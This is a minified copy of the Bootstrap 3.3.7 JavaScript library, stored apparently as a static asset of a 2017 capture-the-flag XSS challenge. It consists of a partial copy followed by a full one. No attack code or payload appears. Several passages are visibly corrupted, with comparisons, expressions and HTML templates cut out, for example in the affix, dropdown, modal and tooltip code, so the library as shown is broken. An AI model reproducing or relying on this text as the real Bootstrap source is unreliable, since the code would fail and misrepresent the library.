e=function(c){c.preventDefault(),b.call(a(this),"show")};a(document).on("click.bs.tab.data-api",'[data-toggle="tab"]',e).on("click.bs.tab.data-api",'[data-toggle="pill"]',e)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.affix"),f="object"==typeof b&&b;e||d.data("bs.affix",e=new c(this,f)),"string"==typeof b&&e[b]()})}var 
c=function(b,d){this.options=a.extend({},c.DEFAULTS,d),this.$target=a(this.options.target).on("scroll.bs.affix.data-api",a.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",a.proxy(this.checkPositionWithEventLoop,this)),this.$element=a(b),this.affixed=null,this.unpin=null,this.pinnedOffset=null,this.checkPosition()};c.VERSION="3.3.7",c.RESET="affix affix-top affix-bottom",c.DEFAULTS={offset:0,target:window},c.prototype.getState=function(a,b,c,d){var e=this.$target.scrollTop(),f=this.$element.offset(),g=this.$target.height();if(null!=c&&"top"==this.affixed)return e=a-d&&"bottom"},c.prototype.getPinnedOffset=function(){if(this.pinnedOffset)return this.pinnedOffset;this.$element.removeClass(c.RESET).addClass("affix");var a=this.$target.scrollTop(),b=this.$element.offset();return this.pinnedOffset=b.top-a},c.prototype.checkPositionWithEventLoop=function(){setTimeout(a.proxy(this.checkPosition,this),1)},c.prototype.checkPosition=function(){if(this.$element.is(":visible")){var b=this.$element.height(),d=this.options.offset,e=d.top,f=d.bottom,g=Math.max(a(document).height(),a(document.body).height());"object"!=typeof d&&(f=e=d),"function"==typeof e&&(e=d.top(this.$element)),"function"==typeof f&&(f=d.bottom(this.$element));var h=this.getState(g,b,e,f);if(this.affixed!=h){null!=this.unpin&&this.$element.css("top","");var i="affix"+(h?"-"+h:""),j=a.Event(i+".bs.affix");if(this.$element.trigger(j),j.isDefaultPrevented())return;this.affixed=h,this.unpin="bottom"==h?this.getPinnedOffset():null,this.$element.removeClass(c.RESET).addClass(i).trigger(i.replace("affix","affixed")+".bs.affix")}"bottom"==h&&this.$element.offset({top:g-b-f})}};var d=a.fn.affix;a.fn.affix=b,a.fn.affix.Constructor=c,a.fn.affix.noConflict=function(){return a.fn.affix=d,this},a(window).on("load",function(){a('[data-spy="affix"]').each(function(){var 
c=a(this),d=c.data();d.offset=d.offset||{},null!=d.offsetBottom&&(d.offset.bottom=d.offsetBottom),null!=d.offsetTop&&(d.offset.top=d.offsetTop),b.call(c,d)})})}(jQuery); -------------------------------------------------------------------------------- /0ctf2017-qual/complicatedxss_500/main/static/bootstrap.min.js: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap v3.3.7 (http://getbootstrap.com) 3 | * Copyright 2011-2016 Twitter, Inc. 4 | * Licensed under the MIT license 5 | */ 6 | if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1||b[0]>3)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transition&&(a.event.special.bsTransitionEnd={bindType:a.support.transition.end,delegateType:a.support.transition.end,handle:function(b){if(a(b.target).is(this))return b.handleObj.handler.apply(this,arguments)}})})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var c=a(this),e=c.data("bs.alert");e||c.data("bs.alert",e=new d(this)),"string"==typeof b&&e[b].call(c)})}var c='[data-dismiss="alert"]',d=function(b){a(b).on("click",c,this.close)};d.VERSION="3.3.7",d.TRANSITION_DURATION=150,d.prototype.close=function(b){function 
c(){g.detach().trigger("closed.bs.alert").remove()}var e=a(this),f=e.attr("data-target");f||(f=e.attr("href"),f=f&&f.replace(/.*(?=#[^\s]*$)/,""));var g=a("#"===f?[]:f);b&&b.preventDefault(),g.length||(g=e.closest(".alert")),g.trigger(b=a.Event("close.bs.alert")),b.isDefaultPrevented()||(g.removeClass("in"),a.support.transition&&g.hasClass("fade")?g.one("bsTransitionEnd",c).emulateTransitionEnd(d.TRANSITION_DURATION):c())};var e=a.fn.alert;a.fn.alert=b,a.fn.alert.Constructor=d,a.fn.alert.noConflict=function(){return a.fn.alert=e,this},a(document).on("click.bs.alert.data-api",c,d.prototype.close)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.button"),f="object"==typeof b&&b;e||d.data("bs.button",e=new c(this,f)),"toggle"==b?e.toggle():b&&e.setState(b)})}var c=function(b,d){this.$element=a(b),this.options=a.extend({},c.DEFAULTS,d),this.isLoading=!1};c.VERSION="3.3.7",c.DEFAULTS={loadingText:"loading..."},c.prototype.setState=function(b){var c="disabled",d=this.$element,e=d.is("input")?"val":"html",f=d.data();b+="Text",null==f.resetText&&d.data("resetText",d[e]()),setTimeout(a.proxy(function(){d[e](null==f[b]?this.options[b]:f[b]),"loadingText"==b?(this.isLoading=!0,d.addClass(c).attr(c,c).prop(c,!0)):this.isLoading&&(this.isLoading=!1,d.removeClass(c).removeAttr(c).prop(c,!1))},this),0)},c.prototype.toggle=function(){var a=!0,b=this.$element.closest('[data-toggle="buttons"]');if(b.length){var c=this.$element.find("input");"radio"==c.prop("type")?(c.prop("checked")&&(a=!1),b.find(".active").removeClass("active"),this.$element.addClass("active")):"checkbox"==c.prop("type")&&(c.prop("checked")!==this.$element.hasClass("active")&&(a=!1),this.$element.toggleClass("active")),c.prop("checked",this.$element.hasClass("active")),a&&c.trigger("change")}else this.$element.attr("aria-pressed",!this.$element.hasClass("active")),this.$element.toggleClass("active")};var 
d=a.fn.button;a.fn.button=b,a.fn.button.Constructor=c,a.fn.button.noConflict=function(){return a.fn.button=d,this},a(document).on("click.bs.button.data-api",'[data-toggle^="button"]',function(c){var d=a(c.target).closest(".btn");b.call(d,"toggle"),a(c.target).is('input[type="radio"], input[type="checkbox"]')||(c.preventDefault(),d.is("input,button")?d.trigger("focus"):d.find("input:visible,button:visible").first().trigger("focus"))}).on("focus.bs.button.data-api blur.bs.button.data-api",'[data-toggle^="button"]',function(b){a(b.target).closest(".btn").toggleClass("focus",/^focus(in)?$/.test(b.type))})}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.carousel"),f=a.extend({},c.DEFAULTS,d.data(),"object"==typeof b&&b),g="string"==typeof b?b:f.slide;e||d.data("bs.carousel",e=new c(this,f)),"number"==typeof b?e.to(b):g?e[g]():f.interval&&e.pause().cycle()})}var c=function(b,c){this.$element=a(b),this.$indicators=this.$element.find(".carousel-indicators"),this.options=c,this.paused=null,this.sliding=null,this.interval=null,this.$active=null,this.$items=null,this.options.keyboard&&this.$element.on("keydown.bs.carousel",a.proxy(this.keydown,this)),"hover"==this.options.pause&&!("ontouchstart"in document.documentElement)&&this.$element.on("mouseenter.bs.carousel",a.proxy(this.pause,this)).on("mouseleave.bs.carousel",a.proxy(this.cycle,this))};c.VERSION="3.3.7",c.TRANSITION_DURATION=600,c.DEFAULTS={interval:5e3,pause:"hover",wrap:!0,keyboard:!0},c.prototype.keydown=function(a){if(!/input|textarea/i.test(a.target.tagName)){switch(a.which){case 37:this.prev();break;case 39:this.next();break;default:return}a.preventDefault()}},c.prototype.cycle=function(b){return b||(this.paused=!1),this.interval&&clearInterval(this.interval),this.options.interval&&!this.paused&&(this.interval=setInterval(a.proxy(this.next,this),this.options.interval)),this},c.prototype.getItemIndex=function(a){return 
this.$items=a.parent().children(".item"),this.$items.index(a||this.$active)},c.prototype.getItemForDirection=function(a,b){var c=this.getItemIndex(b),d="prev"==a&&0===c||"next"==a&&c==this.$items.length-1;if(d&&!this.options.wrap)return b;var e="prev"==a?-1:1,f=(c+e)%this.$items.length;return this.$items.eq(f)},c.prototype.to=function(a){var b=this,c=this.getItemIndex(this.$active=this.$element.find(".item.active"));if(!(a>this.$items.length-1||a<0))return this.sliding?this.$element.one("slid.bs.carousel",function(){b.to(a)}):c==a?this.pause().cycle():this.slide(a>c?"next":"prev",this.$items.eq(a))},c.prototype.pause=function(b){return b||(this.paused=!0),this.$element.find(".next, .prev").length&&a.support.transition&&(this.$element.trigger(a.support.transition.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},c.prototype.next=function(){if(!this.sliding)return this.slide("next")},c.prototype.prev=function(){if(!this.sliding)return this.slide("prev")},c.prototype.slide=function(b,d){var e=this.$element.find(".item.active"),f=d||this.getItemForDirection(b,e),g=this.interval,h="next"==b?"left":"right",i=this;if(f.hasClass("active"))return this.sliding=!1;var j=f[0],k=a.Event("slide.bs.carousel",{relatedTarget:j,direction:h});if(this.$element.trigger(k),!k.isDefaultPrevented()){if(this.sliding=!0,g&&this.pause(),this.$indicators.length){this.$indicators.find(".active").removeClass("active");var l=a(this.$indicators.children()[this.getItemIndex(f)]);l&&l.addClass("active")}var m=a.Event("slid.bs.carousel",{relatedTarget:j,direction:h});return a.support.transition&&this.$element.hasClass("slide")?(f.addClass(b),f[0].offsetWidth,e.addClass(h),f.addClass(h),e.one("bsTransitionEnd",function(){f.removeClass([b,h].join(" ")).addClass("active"),e.removeClass(["active",h].join(" 
")),i.sliding=!1,setTimeout(function(){i.$element.trigger(m)},0)}).emulateTransitionEnd(c.TRANSITION_DURATION)):(e.removeClass("active"),f.addClass("active"),this.sliding=!1,this.$element.trigger(m)),g&&this.cycle(),this}};var d=a.fn.carousel;a.fn.carousel=b,a.fn.carousel.Constructor=c,a.fn.carousel.noConflict=function(){return a.fn.carousel=d,this};var e=function(c){var d,e=a(this),f=a(e.attr("data-target")||(d=e.attr("href"))&&d.replace(/.*(?=#[^\s]+$)/,""));if(f.hasClass("carousel")){var g=a.extend({},f.data(),e.data()),h=e.attr("data-slide-to");h&&(g.interval=!1),b.call(f,g),h&&f.data("bs.carousel").to(h),c.preventDefault()}};a(document).on("click.bs.carousel.data-api","[data-slide]",e).on("click.bs.carousel.data-api","[data-slide-to]",e),a(window).on("load",function(){a('[data-ride="carousel"]').each(function(){var c=a(this);b.call(c,c.data())})})}(jQuery),+function(a){"use strict";function b(b){var c,d=b.attr("data-target")||(c=b.attr("href"))&&c.replace(/.*(?=#[^\s]+$)/,"");return a(d)}function c(b){return this.each(function(){var c=a(this),e=c.data("bs.collapse"),f=a.extend({},d.DEFAULTS,c.data(),"object"==typeof b&&b);!e&&f.toggle&&/show|hide/.test(b)&&(f.toggle=!1),e||c.data("bs.collapse",e=new d(this,f)),"string"==typeof b&&e[b]()})}var d=function(b,c){this.$element=a(b),this.options=a.extend({},d.DEFAULTS,c),this.$trigger=a('[data-toggle="collapse"][href="#'+b.id+'"],[data-toggle="collapse"][data-target="#'+b.id+'"]'),this.transitioning=null,this.options.parent?this.$parent=this.getParent():this.addAriaAndCollapsedClass(this.$element,this.$trigger),this.options.toggle&&this.toggle()};d.VERSION="3.3.7",d.TRANSITION_DURATION=350,d.DEFAULTS={toggle:!0},d.prototype.dimension=function(){var a=this.$element.hasClass("width");return a?"width":"height"},d.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var b,e=this.$parent&&this.$parent.children(".panel").children(".in, 
.collapsing");if(!(e&&e.length&&(b=e.data("bs.collapse"),b&&b.transitioning))){var f=a.Event("show.bs.collapse");if(this.$element.trigger(f),!f.isDefaultPrevented()){e&&e.length&&(c.call(e,"hide"),b||e.data("bs.collapse",null));var g=this.dimension();this.$element.removeClass("collapse").addClass("collapsing")[g](0).attr("aria-expanded",!0),this.$trigger.removeClass("collapsed").attr("aria-expanded",!0),this.transitioning=1;var h=function(){this.$element.removeClass("collapsing").addClass("collapse in")[g](""),this.transitioning=0,this.$element.trigger("shown.bs.collapse")};if(!a.support.transition)return h.call(this);var i=a.camelCase(["scroll",g].join("-"));this.$element.one("bsTransitionEnd",a.proxy(h,this)).emulateTransitionEnd(d.TRANSITION_DURATION)[g](this.$element[0][i])}}}},d.prototype.hide=function(){if(!this.transitioning&&this.$element.hasClass("in")){var b=a.Event("hide.bs.collapse");if(this.$element.trigger(b),!b.isDefaultPrevented()){var c=this.dimension();this.$element[c](this.$element[c]())[0].offsetHeight,this.$element.addClass("collapsing").removeClass("collapse in").attr("aria-expanded",!1),this.$trigger.addClass("collapsed").attr("aria-expanded",!1),this.transitioning=1;var e=function(){this.transitioning=0,this.$element.removeClass("collapsing").addClass("collapse").trigger("hidden.bs.collapse")};return a.support.transition?void this.$element[c](0).one("bsTransitionEnd",a.proxy(e,this)).emulateTransitionEnd(d.TRANSITION_DURATION):e.call(this)}}},d.prototype.toggle=function(){this[this.$element.hasClass("in")?"hide":"show"]()},d.prototype.getParent=function(){return a(this.options.parent).find('[data-toggle="collapse"][data-parent="'+this.options.parent+'"]').each(a.proxy(function(c,d){var e=a(d);this.addAriaAndCollapsedClass(b(e),e)},this)).end()},d.prototype.addAriaAndCollapsedClass=function(a,b){var c=a.hasClass("in");a.attr("aria-expanded",c),b.toggleClass("collapsed",!c).attr("aria-expanded",c)};var 
e=a.fn.collapse;a.fn.collapse=c,a.fn.collapse.Constructor=d,a.fn.collapse.noConflict=function(){return a.fn.collapse=e,this},a(document).on("click.bs.collapse.data-api",'[data-toggle="collapse"]',function(d){var e=a(this);e.attr("data-target")||d.preventDefault();var f=b(e),g=f.data("bs.collapse"),h=g?"toggle":e.data();c.call(f,h)})}(jQuery),+function(a){"use strict";function b(b){var c=b.attr("data-target");c||(c=b.attr("href"),c=c&&/#[A-Za-z]/.test(c)&&c.replace(/.*(?=#[^\s]*$)/,""));var d=c&&a(c);return d&&d.length?d:b.parent()}function c(c){c&&3===c.which||(a(e).remove(),a(f).each(function(){var d=a(this),e=b(d),f={relatedTarget:this};e.hasClass("open")&&(c&&"click"==c.type&&/input|textarea/i.test(c.target.tagName)&&a.contains(e[0],c.target)||(e.trigger(c=a.Event("hide.bs.dropdown",f)),c.isDefaultPrevented()||(d.attr("aria-expanded","false"),e.removeClass("open").trigger(a.Event("hidden.bs.dropdown",f)))))}))}function d(b){return this.each(function(){var c=a(this),d=c.data("bs.dropdown");d||c.data("bs.dropdown",d=new g(this)),"string"==typeof b&&d[b].call(c)})}var e=".dropdown-backdrop",f='[data-toggle="dropdown"]',g=function(b){a(b).on("click.bs.dropdown",this.toggle)};g.VERSION="3.3.7",g.prototype.toggle=function(d){var e=a(this);if(!e.is(".disabled, :disabled")){var f=b(e),g=f.hasClass("open");if(c(),!g){"ontouchstart"in document.documentElement&&!f.closest(".navbar-nav").length&&a(document.createElement("div")).addClass("dropdown-backdrop").insertAfter(a(this)).on("click",c);var h={relatedTarget:this};if(f.trigger(d=a.Event("show.bs.dropdown",h)),d.isDefaultPrevented())return;e.trigger("focus").attr("aria-expanded","true"),f.toggleClass("open").trigger(a.Event("shown.bs.dropdown",h))}return!1}},g.prototype.keydown=function(c){if(/(38|40|27|32)/.test(c.which)&&!/input|textarea/i.test(c.target.tagName)){var d=a(this);if(c.preventDefault(),c.stopPropagation(),!d.is(".disabled, :disabled")){var 
e=b(d),g=e.hasClass("open");if(!g&&27!=c.which||g&&27==c.which)return 27==c.which&&e.find(f).trigger("focus"),d.trigger("click");var h=" li:not(.disabled):visible a",i=e.find(".dropdown-menu"+h);if(i.length){var j=i.index(c.target);38==c.which&&j>0&&j--,40==c.which&&jdocument.documentElement.clientHeight;this.$element.css({paddingLeft:!this.bodyIsOverflowing&&a?this.scrollbarWidth:"",paddingRight:this.bodyIsOverflowing&&!a?this.scrollbarWidth:""})},c.prototype.resetAdjustments=function(){this.$element.css({paddingLeft:"",paddingRight:""})},c.prototype.checkScrollbar=function(){var a=window.innerWidth;if(!a){var b=document.documentElement.getBoundingClientRect();a=b.right-Math.abs(b.left)}this.bodyIsOverflowing=document.body.clientWidth
',trigger:"hover focus",title:"",delay:0,html:!1,container:!1,viewport:{selector:"body",padding:0}},c.prototype.init=function(b,c,d){if(this.enabled=!0,this.type=b,this.$element=a(c),this.options=this.getOptions(d),this.$viewport=this.options.viewport&&a(a.isFunction(this.options.viewport)?this.options.viewport.call(this,this.$element):this.options.viewport.selector||this.options.viewport),this.inState={click:!1,hover:!1,focus:!1},this.$element[0]instanceof document.constructor&&!this.options.selector)throw new Error("`selector` option must be specified when initializing "+this.type+" on the window.document object!");for(var e=this.options.trigger.split(" "),f=e.length;f--;){var g=e[f];if("click"==g)this.$element.on("click."+this.type,this.options.selector,a.proxy(this.toggle,this));else if("manual"!=g){var h="hover"==g?"mouseenter":"focusin",i="hover"==g?"mouseleave":"focusout";this.$element.on(h+"."+this.type,this.options.selector,a.proxy(this.enter,this)),this.$element.on(i+"."+this.type,this.options.selector,a.proxy(this.leave,this))}}this.options.selector?this._options=a.extend({},this.options,{trigger:"manual",selector:""}):this.fixTitle()},c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.getOptions=function(b){return b=a.extend({},this.getDefaults(),this.$element.data(),b),b.delay&&"number"==typeof b.delay&&(b.delay={show:b.delay,hide:b.delay}),b},c.prototype.getDelegateOptions=function(){var b={},c=this.getDefaults();return this._options&&a.each(this._options,function(a,d){c[a]!=d&&(b[a]=d)}),b},c.prototype.enter=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);return c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof 
a.Event&&(c.inState["focusin"==b.type?"focus":"hover"]=!0),c.tip().hasClass("in")||"in"==c.hoverState?void(c.hoverState="in"):(clearTimeout(c.timeout),c.hoverState="in",c.options.delay&&c.options.delay.show?void(c.timeout=setTimeout(function(){"in"==c.hoverState&&c.show()},c.options.delay.show)):c.show())},c.prototype.isInStateTrue=function(){for(var a in this.inState)if(this.inState[a])return!0;return!1},c.prototype.leave=function(b){var c=b instanceof this.constructor?b:a(b.currentTarget).data("bs."+this.type);if(c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c)),b instanceof a.Event&&(c.inState["focusout"==b.type?"focus":"hover"]=!1),!c.isInStateTrue())return clearTimeout(c.timeout),c.hoverState="out",c.options.delay&&c.options.delay.hide?void(c.timeout=setTimeout(function(){"out"==c.hoverState&&c.hide()},c.options.delay.hide)):c.hide()},c.prototype.show=function(){var b=a.Event("show.bs."+this.type);if(this.hasContent()&&this.enabled){this.$element.trigger(b);var d=a.contains(this.$element[0].ownerDocument.documentElement,this.$element[0]);if(b.isDefaultPrevented()||!d)return;var e=this,f=this.tip(),g=this.getUID(this.type);this.setContent(),f.attr("id",g),this.$element.attr("aria-describedby",g),this.options.animation&&f.addClass("fade");var h="function"==typeof this.options.placement?this.options.placement.call(this,f[0],this.$element[0]):this.options.placement,i=/\s?auto?\s?/i,j=i.test(h);j&&(h=h.replace(i,"")||"top"),f.detach().css({top:0,left:0,display:"block"}).addClass(h).data("bs."+this.type,this),this.options.container?f.appendTo(this.options.container):f.insertAfter(this.$element),this.$element.trigger("inserted.bs."+this.type);var k=this.getPosition(),l=f[0].offsetWidth,m=f[0].offsetHeight;if(j){var n=h,o=this.getPosition(this.$viewport);h="bottom"==h&&k.bottom+m>o.bottom?"top":"top"==h&&k.top-mo.width?"left":"left"==h&&k.left-lg.top+g.height&&(e.top=g.top+g.height-i)}else{var 
j=b.left-f,k=b.left+f+c;jg.right&&(e.left=g.left+g.width-k)}return e},c.prototype.getTitle=function(){var a,b=this.$element,c=this.options;return a=b.attr("data-original-title")||("function"==typeof c.title?c.title.call(b[0]):c.title)},c.prototype.getUID=function(a){do a+=~~(1e6*Math.random());while(document.getElementById(a));return a},c.prototype.tip=function(){if(!this.$tip&&(this.$tip=a(this.options.template),1!=this.$tip.length))throw new Error(this.type+" `template` option must consist of exactly 1 top-level element!");return this.$tip},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".tooltip-arrow")},c.prototype.enable=function(){this.enabled=!0},c.prototype.disable=function(){this.enabled=!1},c.prototype.toggleEnabled=function(){this.enabled=!this.enabled},c.prototype.toggle=function(b){var c=this;b&&(c=a(b.currentTarget).data("bs."+this.type),c||(c=new this.constructor(b.currentTarget,this.getDelegateOptions()),a(b.currentTarget).data("bs."+this.type,c))),b?(c.inState.click=!c.inState.click,c.isInStateTrue()?c.enter(c):c.leave(c)):c.tip().hasClass("in")?c.leave(c):c.enter(c)},c.prototype.destroy=function(){var a=this;clearTimeout(this.timeout),this.hide(function(){a.$element.off("."+a.type).removeData("bs."+a.type),a.$tip&&a.$tip.detach(),a.$tip=null,a.$arrow=null,a.$viewport=null,a.$element=null})};var d=a.fn.tooltip;a.fn.tooltip=b,a.fn.tooltip.Constructor=c,a.fn.tooltip.noConflict=function(){return a.fn.tooltip=d,this}}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.popover"),f="object"==typeof b&&b;!e&&/destroy|hide/.test(b)||(e||d.data("bs.popover",e=new c(this,f)),"string"==typeof b&&e[b]())})}var c=function(a,b){this.init("popover",a,b)};if(!a.fn.tooltip)throw new Error("Popover requires 
tooltip.js");c.VERSION="3.3.7",c.DEFAULTS=a.extend({},a.fn.tooltip.Constructor.DEFAULTS,{placement:"right",trigger:"click",content:"",template:''}),c.prototype=a.extend({},a.fn.tooltip.Constructor.prototype),c.prototype.constructor=c,c.prototype.getDefaults=function(){return c.DEFAULTS},c.prototype.setContent=function(){var a=this.tip(),b=this.getTitle(),c=this.getContent();a.find(".popover-title")[this.options.html?"html":"text"](b),a.find(".popover-content").children().detach().end()[this.options.html?"string"==typeof c?"html":"append":"text"](c),a.removeClass("fade top bottom left right in"),a.find(".popover-title").html()||a.find(".popover-title").hide()},c.prototype.hasContent=function(){return this.getTitle()||this.getContent()},c.prototype.getContent=function(){var a=this.$element,b=this.options;return a.attr("data-content")||("function"==typeof b.content?b.content.call(a[0]):b.content)},c.prototype.arrow=function(){return this.$arrow=this.$arrow||this.tip().find(".arrow")};var d=a.fn.popover;a.fn.popover=b,a.fn.popover.Constructor=c,a.fn.popover.noConflict=function(){return a.fn.popover=d,this}}(jQuery),+function(a){"use strict";function b(c,d){this.$body=a(document.body),this.$scrollElement=a(a(c).is(document.body)?window:c),this.options=a.extend({},b.DEFAULTS,d),this.selector=(this.options.target||"")+" .nav li > a",this.offsets=[],this.targets=[],this.activeTarget=null,this.scrollHeight=0,this.$scrollElement.on("scroll.bs.scrollspy",a.proxy(this.process,this)),this.refresh(),this.process()}function c(c){return this.each(function(){var d=a(this),e=d.data("bs.scrollspy"),f="object"==typeof c&&c;e||d.data("bs.scrollspy",e=new b(this,f)),"string"==typeof c&&e[c]()})}b.VERSION="3.3.7",b.DEFAULTS={offset:10},b.prototype.getScrollHeight=function(){return this.$scrollElement[0].scrollHeight||Math.max(this.$body[0].scrollHeight,document.documentElement.scrollHeight)},b.prototype.refresh=function(){var 
b=this,c="offset",d=0;this.offsets=[],this.targets=[],this.scrollHeight=this.getScrollHeight(),a.isWindow(this.$scrollElement[0])||(c="position",d=this.$scrollElement.scrollTop()),this.$body.find(this.selector).map(function(){var b=a(this),e=b.data("target")||b.attr("href"),f=/^#./.test(e)&&a(e);return f&&f.length&&f.is(":visible")&&[[f[c]().top+d,e]]||null}).sort(function(a,b){return a[0]-b[0]}).each(function(){b.offsets.push(this[0]),b.targets.push(this[1])})},b.prototype.process=function(){var a,b=this.$scrollElement.scrollTop()+this.options.offset,c=this.getScrollHeight(),d=this.options.offset+c-this.$scrollElement.height(),e=this.offsets,f=this.targets,g=this.activeTarget;if(this.scrollHeight!=c&&this.refresh(),b>=d)return g!=(a=f[f.length-1])&&this.activate(a);if(g&&b=e[a]&&(void 0===e[a+1]||b .dropdown-menu > .active").removeClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!1),b.addClass("active").find('[data-toggle="tab"]').attr("aria-expanded",!0),h?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu").length&&b.closest("li.dropdown").addClass("active").end().find('[data-toggle="tab"]').attr("aria-expanded",!0),e&&e()}var g=d.find("> .active"),h=e&&a.support.transition&&(g.length&&g.hasClass("fade")||!!d.find("> .fade").length);g.length&&h?g.one("bsTransitionEnd",f).emulateTransitionEnd(c.TRANSITION_DURATION):f(),g.removeClass("in")};var d=a.fn.tab;a.fn.tab=b,a.fn.tab.Constructor=c,a.fn.tab.noConflict=function(){return a.fn.tab=d,this};var e=function(c){c.preventDefault(),b.call(a(this),"show")};a(document).on("click.bs.tab.data-api",'[data-toggle="tab"]',e).on("click.bs.tab.data-api",'[data-toggle="pill"]',e)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.affix"),f="object"==typeof b&&b;e||d.data("bs.affix",e=new c(this,f)),"string"==typeof b&&e[b]()})}var 
c=function(b,d){this.options=a.extend({},c.DEFAULTS,d),this.$target=a(this.options.target).on("scroll.bs.affix.data-api",a.proxy(this.checkPosition,this)).on("click.bs.affix.data-api",a.proxy(this.checkPositionWithEventLoop,this)),this.$element=a(b),this.affixed=null,this.unpin=null,this.pinnedOffset=null,this.checkPosition()};c.VERSION="3.3.7",c.RESET="affix affix-top affix-bottom",c.DEFAULTS={offset:0,target:window},c.prototype.getState=function(a,b,c,d){var e=this.$target.scrollTop(),f=this.$element.offset(),g=this.$target.height();if(null!=c&&"top"==this.affixed)return e=a-d&&"bottom"},c.prototype.getPinnedOffset=function(){if(this.pinnedOffset)return this.pinnedOffset;this.$element.removeClass(c.RESET).addClass("affix");var a=this.$target.scrollTop(),b=this.$element.offset();return this.pinnedOffset=b.top-a},c.prototype.checkPositionWithEventLoop=function(){setTimeout(a.proxy(this.checkPosition,this),1)},c.prototype.checkPosition=function(){if(this.$element.is(":visible")){var b=this.$element.height(),d=this.options.offset,e=d.top,f=d.bottom,g=Math.max(a(document).height(),a(document.body).height());"object"!=typeof d&&(f=e=d),"function"==typeof e&&(e=d.top(this.$element)),"function"==typeof f&&(f=d.bottom(this.$element));var h=this.getState(g,b,e,f);if(this.affixed!=h){null!=this.unpin&&this.$element.css("top","");var i="affix"+(h?"-"+h:""),j=a.Event(i+".bs.affix");if(this.$element.trigger(j),j.isDefaultPrevented())return;this.affixed=h,this.unpin="bottom"==h?this.getPinnedOffset():null,this.$element.removeClass(c.RESET).addClass(i).trigger(i.replace("affix","affixed")+".bs.affix")}"bottom"==h&&this.$element.offset({top:g-b-f})}};var d=a.fn.affix;a.fn.affix=b,a.fn.affix.Constructor=c,a.fn.affix.noConflict=function(){return a.fn.affix=d,this},a(window).on("load",function(){a('[data-spy="affix"]').each(function(){var 
c=a(this),d=c.data();d.offset=d.offset||{},null!=d.offsetBottom&&(d.offset.bottom=d.offsetBottom),null!=d.offsetTop&&(d.offset.top=d.offsetTop),b.call(c,d)})})}(jQuery); --------------------------------------------------------------------------------